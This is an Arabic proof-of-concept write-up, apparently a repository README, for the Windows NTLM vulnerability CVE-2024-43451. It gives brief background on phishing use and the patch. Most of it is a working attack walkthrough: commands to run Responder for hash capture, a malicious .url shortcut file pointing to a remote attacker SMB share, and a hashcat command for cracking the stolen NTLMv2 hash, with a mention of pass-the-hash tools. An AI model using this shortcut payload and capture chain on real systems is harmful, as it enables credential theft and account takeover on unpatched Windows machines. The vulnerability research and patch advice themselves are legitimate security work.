
CVE-2024-43451 هي ثغرة أمنية في NTLM في Windows تسمح للمهاجم بفرض المصادقة والتقاط تجزئات NTLM باستخدام اختصارات خبيثة.
CVE-2024-43451 هي ثغرة من نوع zero-day في مايكروسوفت ويندوز تسمح للمهاجمين بالتقاط هاشات كلمات المرور NTLMv2 بأقل تفاعل من المستخدم، مما قد يؤدي إلى سرقة بيانات الاعتماد. تتضمن طريقة شائعة الاستخدام استغلال مصادقة NTLM عبر اتصالات SMB إلى خادم بعيد لالتقاط الهاش. تم تصحيح هذه الثغرة في تحديثات نوفمبر 2024. يُنصح المستخدمون بتطبيق التحديثات الأمنية ذات الصلة لتخفيف المخاطر.
تم اكتشاف استغلال هذا الهجوم بنشاط باستخدام بريد إلكتروني تصيدي مرسل من خادم حكومي أوكراني مخترق.
يحتوي البريد الإلكتروني على ملف رابط خبيث. عندما يتفاعل المستخدم مع الملف عن طريق النقر بزر الماوس الأيمن أو حذفه أو نقله، يتم تفعيل الثغرة.
يؤدي ذلك إلى اتصال بخادم المهاجم، مما يؤدي إلى تنزيل المزيد من الملفات الخبيثة، مثل برمجية SparkRAT الخبيثة (حصان طروادة للوصول عن بُعد مفتوح المصدر يسمح للمهاجم بالسيطرة على نظام الضحية).
NTLMv2 هي حاليًا النسخة الأكثر أمانًا والأكثر صلة اليوم.
image
لإنشاء بيئة عمل لإثبات المفهوم (POC) هذا، يجب إعداد جهاز ويندوز مستهدف برقم إصدار تم إصداره قبل نوفمبر 2024، وخادم بعيد لمحاكاة التقاط الهاش:
Responder لالتقاط الهاش عبر SMB:
brew install python3
git clone https://github.com/lgandx/Responder.git
cd Responder
sudo python3 Responder.py -I <ضع واجهة الشبكة الخاصة بك> -v
\\(عنوان IP للخادم البعيد):
نظرًا لأن كل ما يحتاجه الاستغلال هو إنشاء اتصال SMB مع الخادم البعيد، يمكننا استخدام ملف بسيط لمحاكاته:
[InternetShortcut]
URL=\\(عنوان IP للخادم البعيد)\share
IconIndex=32
IconFile=C:\Windows\System32\shell32.dll
بمجرد تحضير الملف وتسليمه إلى النظام المستهدف، فإن سرقة الهاش تتطلب الحد الأدنى من تفاعل المستخدم.
قد يشمل هذا التفاعل أيًا من الإجراءات التالية:
https://github.com/user-attachments/assets/fd6389b5-4ee9-4d90-a76e-562394b24058
https://github.com/user-attachments/assets/b820ea73-b0fc-40f1-920e-28cf7869f1e2
بامتلاك الهاش غير المشفر، يمكننا إما محاولة فك تشفيره للكشف عن كلمة المرور النصية
أو استخدامه في هجوم "Pass-the-Hash" باستخدام أدوات مثل Mimikatz أو Metasploit.
في حالتنا، يكشف أمر بسيط لـ Hashcat عن كلمة المرور الخاصة بي:
hashcat -m 5600 leak.txt rockyou.txt
